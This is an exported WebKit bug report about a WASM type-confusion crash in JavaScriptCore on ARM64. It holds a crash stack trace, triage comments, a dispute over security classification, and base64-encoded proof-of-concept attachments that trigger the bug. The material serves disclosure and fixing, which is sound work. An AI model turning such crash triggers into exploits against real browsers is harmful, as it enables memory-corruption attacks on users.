250024 2023-01-03 07:37:51 -0800 [WASM][ARM64] Type confused of StackVisitor in JSC::StackVisitor::visit 2023-01-17 16:17:51 -0800 1 1 1 Unclassified WebKit JavaScriptCore WebKit Local Build Mac (Apple Silicon) Unspecified RESOLVED FIXED InRadar P1 Critical --- 1 cz18811105578 ysuzuki bfulgham hackerzheng666 justin_michaud mark.lam webkit-bug-importer ysuzuki oldest_to_newest 1922619 0 464306 cz18811105578 2023-01-03 07:37:51 -0800 Created attachment 464306 Reproducible poc ASSERTION FAILED: cell /Users/x/Desktop/AFL-WASM-main/WebKit_patch/Source/JavaScriptCore/runtime/JSObject.h(1363) : JSC::JSObject *JSC::asObject(JSC::JSCell *) 1 0x10bf45b58 WTFCrash 2 0x109cebd30 JSC::ARM64Assembler::insn(int) 3 0x109cbbfd8 JSC::asObject(JSC::JSCell*) 4 0x109cbbf60 JSC::asObject(JSC::JSValue) 5 0x10b542ea4 JSC::Register::object() const 6 0x109c9f524 JSC::CallFrame::jsCallee() const 7 0x10b396b88 JSC::CallFrame::isStackOverflowFrame() const 8 0x10afd8460 JSC::StackVisitor::StackVisitor(JSC::CallFrame*, JSC::VM&) 9 0x10afd888c JSC::StackVisitor::StackVisitor(JSC::CallFrame*, JSC::VM&) 10 0x10afcfd6c void JSC::StackVisitor::visit<(JSC::StackVisitor::EmptyEntryFrameAction)0, JSC::Interpreter::getStackTrace(JSC::JSCell*, WTF::Vector<JSC::StackFrame, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>&, unsigned long, unsigned long)::$_6>(JSC::CallFrame*, JSC::VM&, JSC::Interpreter::getStackTrace(JSC::JSCell*, WTF::Vector<JSC::StackFrame, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>&, unsigned long, unsigned long)::$_6 const&) 11 0x10afcfc14 JSC::Interpreter::getStackTrace(JSC::JSCell*, WTF::Vector<JSC::StackFrame, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>&, unsigned long, unsigned long) 12 0x10b48e128 JSC::getStackTrace(JSC::JSGlobalObject*, JSC::VM&, JSC::JSObject*, bool) 13 0x10b4908bc JSC::ErrorInstance::finishCreation(JSC::VM&, JSC::JSGlobalObject*, WTF::String const&, JSC::JSValue, WTF::String (*)(WTF::String const&, WTF::StringView, JSC::RuntimeType, JSC::ErrorInstance::SourceTextWhereErrorOccurred), JSC::RuntimeType, bool) 14 0x10bdf56a0 JSC::ErrorInstance::create(JSC::JSGlobalObject*, JSC::VM&, JSC::Structure*, WTF::String const&, JSC::JSValue, WTF::String (*)(WTF::String const&, WTF::StringView, JSC::RuntimeType, JSC::ErrorInstance::SourceTextWhereErrorOccurred), JSC::RuntimeType, JSC::ErrorType, bool) 15 0x10bdf889c JSC::createJSWebAssemblyRuntimeError(JSC::JSGlobalObject*, JSC::VM&, JSC::Wasm::ExceptionType) 16 0x10bd5c394 operationWasmToJSException 17 0x10bd8cfb0 slow_path_wasm_throw_exception 18 0x109b77f44 wasmLLIntPCRangeStart 19 0x100000000 (null) 1922620 1 webkit-bug-importer 2023-01-03 07:38:03 -0800 <rdar://problem/103834422> 1922621 2 cz18811105578 2023-01-03 07:40:38 -0800 This poc crashes the jsc on ARM64 commit: 8bacbc1a234b 1922622 3 webkit-bug-importer 2023-01-03 07:40:47 -0800 <rdar://problem/103834490> 1923801 4 cz18811105578 2023-01-07 07:35:24 -0800 friendly ping 1924236 5 464433 justin_michaud 2023-01-09 17:38:19 -0800 Created attachment 464433 Simple poc Nice catch! 1) This test case requires both SIMD and tail calls 2) I am guessing that many of these bugs all stem from the same source 3) I have attached a super simple poc: (module (func $start (export "start") (call $f1)) (func $f1 (local v128) (try (do) (catch_all)) (return_call $f2)) (func $f2) ) 1924237 6 464434 justin_michaud 2023-01-09 17:38:34 -0800 Created attachment 464434 Simple poc driver 1924352 7 ysuzuki 2023-01-10 02:18:14 -0800 This is tail-call specific issue. Let's just fix it in public repository since it isn't shipped yet. 1924353 8 ysuzuki 2023-01-10 02:22:26 -0800 Pull request: https://github.com/WebKit/WebKit/pull/8450 1924354 9 cz18811105578 2023-01-10 02:46:00 -0800 All the spec this POC required is enabled by DEFAULT, so I think the spec is READY to ship. The security label need to be kept anyway. 1924474 10 ews-feeder 2023-01-10 08:40:20 -0800 Committed 258725@main (0eced4e49803): <https://commits.webkit.org/258725@main> Reviewed commits have been landed. Closing PR #8450 and removing active labels. 1924506 11 mark.lam 2023-01-10 10:17:52 -0800 (In reply to CAO ZONG from comment #9) > All the spec this POC required is enabled by DEFAULT, so I think the spec is > READY to ship. The security label need to be kept anyway. Hi Cao, it's not considered a security issue because this is newly developed code that has not been deployed on any platforms yet. Thanks for reporting the bug. 1924509 12 cz18811105578 2023-01-10 10:37:21 -0800 (In reply to Mark Lam from comment #11) > (In reply to CAO ZONG from comment #9) > > All the spec this POC required is enabled by DEFAULT, so I think the spec is > > READY to ship. The security label need to be kept anyway. > > Hi Cao, it's not considered a security issue because this is newly developed > code that has not been deployed on any platforms yet. Thanks for reporting > the bug. Hello Mark! Well, According to Apple Security Bounty Guidelines "For example, security issues that are unique to newly added features or code in developer or public beta releases — including newly introduced regressions...", I think the bug in newly developed code need also considered for security impact. So will this issue be assigned CVE or any acknowledge? 1924513 13 mark.lam 2023-01-10 10:44:13 -0800 (In reply to CAO ZONG from comment #12) > (In reply to Mark Lam from comment #11) > > (In reply to CAO ZONG from comment #9) > > > All the spec this POC required is enabled by DEFAULT, so I think the spec is > > > READY to ship. The security label need to be kept anyway. > > > > Hi Cao, it's not considered a security issue because this is newly developed > > code that has not been deployed on any platforms yet. Thanks for reporting > > the bug. > > Hello Mark! > Well, According to Apple Security Bounty Guidelines "For example, security > issues that are unique to newly added features or code in developer or > public beta releases — including newly introduced regressions...", I think > the bug in newly developed code need also considered for security impact. So > will this issue be assigned CVE or any acknowledge? The WebKit open source project does not and cannot speak for Apple Security. Please contact them for clarification. Thanks. 1924514 14 mark.lam 2023-01-10 10:45:20 -0800 <rdar://problem/103834422> 1924515 15 cz18811105578 2023-01-10 10:49:40 -0800 (In reply to Mark Lam from comment #13) > (In reply to CAO ZONG from comment #12) > > (In reply to Mark Lam from comment #11) > > > (In reply to CAO ZONG from comment #9) > > > > All the spec this POC required is enabled by DEFAULT, so I think the spec is > > > > READY to ship. The security label need to be kept anyway. > > > > > > Hi Cao, it's not considered a security issue because this is newly developed > > > code that has not been deployed on any platforms yet. Thanks for reporting > > > the bug. > > > > Hello Mark! > > Well, According to Apple Security Bounty Guidelines "For example, security > > issues that are unique to newly added features or code in developer or > > public beta releases — including newly introduced regressions...", I think > > the bug in newly developed code need also considered for security impact. So > > will this issue be assigned CVE or any acknowledge? > > The WebKit open source project does not and cannot speak for Apple Security. > Please contact them for clarification. Thanks. OK, and thanks for your patient reply :) 1926117 16 ysuzuki 2023-01-17 15:53:00 -0800 *** Bug 249700 has been marked as a duplicate of this bug. *** 1926120 17 ysuzuki 2023-01-17 16:05:12 -0800 *** Bug 249935 has been marked as a duplicate of this bug. *** 1926124 18 ysuzuki 2023-01-17 16:08:40 -0800 *** Bug 250008 has been marked as a duplicate of this bug. *** 1926135 19 ysuzuki 2023-01-17 16:17:51 -0800 *** Bug 249762 has been marked as a duplicate of this bug. *** 464306 2023-01-03 07:37:51 -0800 2023-01-03 07:37:51 -0800 Reproducible poc poc0103-2.js text/javascript 1276 cz18811105578 dmFyIHdhc21fY29kZSA9IG5ldyBVaW50OEFycmF5KFswLDk3LDExNSwxMDksMSwwLDAsMCwxLDE0 MiwxMjgsMTI4LDEyOCwwLDMsOTYsMywxMjcsMTI3LDEyNywxLDEyNyw5NiwwLDAsOTYsMCwwLDMs MTMyLDEyOCwxMjgsMTI4LDAsMywwLDEsMSw0LDEzMywxMjgsMTI4LDEyOCwwLDEsMTEyLDEsMyw3 LDUsMTMyLDEyOCwxMjgsMTI4LDAsMSwxLDE2LDMyLDEzLDEzMSwxMjgsMTI4LDEyOCwwLDEsMCwx LDYsMTYwLDEyOSwxMjgsMTI4LDAsMTUsMTI3LDAsNjUsMCwxMSwxMjQsMSw2OCwwLDAsMCwwLDAs MCwwLDAsMTEsMTI0LDEsNjgsMCwwLDAsMCwwLDAsMCwwLDExLDEyNywxLDY1LDAsMTEsMTIzLDEs MjUzLDEyLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMTEsMTI1LDEsNjcsMCwwLDAs MCwxMSwxMjUsMSw2NywwLDAsMCwwLDExLDEyNiwxLDY2LDAsMTEsMTI2LDEsNjYsMCwxMSwxMjYs MSw2NiwwLDExLDEyMywxLDI1MywxMiwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDEx LDEyNiwxLDY2LDAsMTEsMTIzLDEsMjUzLDEyLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCww LDAsMTEsMTIzLDEsMjUzLDEyLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMTEsMTI2 LDEsNjYsMCwxMSw3LDEzNiwxMjgsMTI4LDEyOCwwLDEsNCwxMDksOTcsMTA1LDExMCwwLDAsOSwx NDUsMTI4LDEyOCwxMjgsMCwxLDYsMCw2NSwwLDExLDExMiwzLDIxMCwwLDExLDIxMCwxLDExLDIx MCwyLDExLDEwLDI0OSwxMjgsMTI4LDEyOCwwLDMsNTgsOCwxLDEyNiwxLDEyNSwxLDEyNCwyLDEy NiwxLDEyNywzLDEyNiwxLDEyNSwyLDEyNiwxNiwyLDE2LDIsMTYsMiwxNiwyLDE2LDIsMTYsMiwy LDEyNywxNiwxLDY1LDIzNiwxLDExLDY1LDAsNjUsMCwxMjAsNjUsMCw2NSwwLDE2LDAsMSwyNTQs NjEsMSwyMzYsMjE3LDE3OSwyMzEsMTQsMTEsNDUsMywxNSwxMjcsMSwxMjMsMywxMjcsNiwxMjcs NjcsMCwwLDAsMCw2Nyw0MiwxODUsMTg1LDAsOTIsMjUsNjUsMCwxMSw2NSwxNzIsMjIsMjUzLDE1 LDE4LDIsMTAzLDI1MywyMywwLDI1Myw4OCwwLDI0MywyMzAsMjA1LDI1MSw4LDAsMTEsMTQsNiwy LDEyNCwzLDEyNiwxLDEyNCwyLDEyMywxLDEyNCwzLDEyNywxMV0pOwp2YXIgd2FzbV9tb2R1bGUg PSBuZXcgV2ViQXNzZW1ibHkuTW9kdWxlKHdhc21fY29kZSk7CnZhciB3YXNtX2luc3RhbmNlID0g bmV3IFdlYkFzc2VtYmx5Lkluc3RhbmNlKHdhc21fbW9kdWxlKTsKdmFyIGYgPSB3YXNtX2luc3Rh bmNlLmV4cG9ydHMubWFpbjsKZigpOw== 464433 2023-01-09 17:38:19 -0800 2023-01-09 17:38:19 -0800 Simple poc poc.wat text/plain 162 justin_michaud KG1vZHVsZQogIChmdW5jICRzdGFydCAoZXhwb3J0ICJzdGFydCIpCiAgICAoY2FsbCAkZjEpKQog IChmdW5jICRmMQogICAgKGxvY2FsIHYxMjgpCiAgICAodHJ5CiAgICAgIChkbykKICAgICAgKGNh dGNoX2FsbCkpCiAgICAocmV0dXJuX2NhbGwgJGYyKSkKICAoZnVuYyAkZjIpCikK 464434 2023-01-09 17:38:34 -0800 2023-01-09 17:38:34 -0800 Simple poc driver poc.js application/x-javascript 226 justin_michaud dmFyIHdhc21fY29kZSA9IHJlYWQoIi9Vc2Vycy9qdXN0aW5fbWljaGF1ZC9EZXNrdG9wL3BvYy53 YXNtIiwgImJpbmFyeSIpCnZhciB3YXNtX21vZHVsZSA9IG5ldyBXZWJBc3NlbWJseS5Nb2R1bGUo d2FzbV9jb2RlKTsKdmFyIHdhc21faW5zdGFuY2UgPSBuZXcgV2ViQXNzZW1ibHkuSW5zdGFuY2Uo d2FzbV9tb2R1bGUpOwp2YXIgZiA9IHdhc21faW5zdGFuY2UuZXhwb3J0cy5zdGFydDsKZigpOw==